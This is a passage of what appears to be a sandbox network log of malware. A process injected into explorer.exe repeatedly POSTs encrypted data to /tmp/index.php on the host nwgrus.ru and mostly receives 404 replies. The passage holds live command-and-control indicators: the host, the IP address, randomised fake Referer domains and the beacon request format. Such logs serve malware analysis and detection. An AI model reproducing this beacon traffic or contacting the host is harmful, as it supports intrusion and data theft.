65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.8	49729	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:38:17.688922882 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lgertcnwaskqpc.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 367 Host: nwgrus.ru
Sep 30, 2024 15:38:17.688955069 CEST	367	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 7b 23 cc 91 Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vu{#fEi7`?-WFb%^Wq33]%DD/:5t~6!ON]CB>q.EvZ~tb_ 0cc>6
Sep 30, 2024 15:38:18.643527031 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:38:18 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.8	49730	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:38:18.667552948 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fevqsrdkflt.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 242 Host: nwgrus.ru
Sep 30, 2024 15:38:18.667552948 CEST	242	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 4d 59 e2 fe Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vuMY2r][6We_]frMo[.]>RD(QveAG~3fV0PL'AeBchUnw8s;k=
Sep 30, 2024 15:38:19.630750895 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:38:19 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.8	49731	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:38:20.111666918 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://drnpfojnpvggv.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 198 Host: nwgrus.ru
Sep 30, 2024 15:38:20.111700058 CEST	198	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 52 14 d2 8f Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vuRVX%P`ayqe^*19tg(<UKUUFagf7>xCAw,E
Sep 30, 2024 15:38:21.247132063 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:38:21 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.8	49732	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:38:21.268733025 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ibetbbesaakqkq.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 319 Host: nwgrus.ru
Sep 30, 2024 15:38:21.268760920 CEST	319	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 4b 0e ff 8b Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vuKuHeub[5[O,14mGl%JP@Xe\)8SY1P~&A.'mWqsT*W&FdVc:!UspM?#
Sep 30, 2024 15:38:22.218976021 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:38:22 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.8	49733	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:38:22.228885889 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tyqfkmhoepxpii.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 269 Host: nwgrus.ru
Sep 30, 2024 15:38:22.228909016 CEST	269	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 2a 2d ae f4 Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vu*-C<-aTSq]/bn81GM=fzi\<a~-&q:;So(7r1@gu;5\r8^
Sep 30, 2024 15:38:23.187736034 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:38:23 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.8	49734	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:38:23.843585968 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wyjfuitjcdhsl.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 313 Host: nwgrus.ru
Sep 30, 2024 15:38:23.843626976 CEST	313	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 3c 09 c7 97 Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vu<_ofu$@Fsy4NCptx]+;k4JIEN%@f&1&P#QhbflO#2\}v.Ax
Sep 30, 2024 15:38:24.807872057 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:38:24 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.8	49735	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:38:24.816634893 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ecpjrwjcauix.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 215 Host: nwgrus.ru
Sep 30, 2024 15:38:24.816654921 CEST	215	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 64 58 fe b7 Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vudXcW_GZK]x%:MaZl&@sES[eTgF.M7m833dBy8JL#
Sep 30, 2024 15:38:26.005872011 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:38:25 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.8	49736	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:38:26.014683008 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bxntarqqdjdvdpxp.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 316 Host: nwgrus.ru
Sep 30, 2024 15:38:26.014754057 CEST	316	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 54 4e c7 fd Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vuTNfihvbLd^=MGBRiiEK`I.F\|W~4\X!Xsbbku?'0Mvzym^Jo6rl?U*
Sep 30, 2024 15:38:26.988398075 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:38:26 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.8	49737	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:38:26.998444080 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://blfmqjnqqyje.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 365 Host: nwgrus.ru
Sep 30, 2024 15:38:26.998467922 CEST	365	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 5a 3f b7 8b Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vuZ?q<[J6\|u$K(*Zn$K2.$K]+!a.- !\0u&%XM(0KJhH{zM?.{
Sep 30, 2024 15:38:27.980511904 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:38:27 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.8	49751	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:39:33.966938019 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gieuyuggiqfgtm.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 180 Host: nwgrus.ru
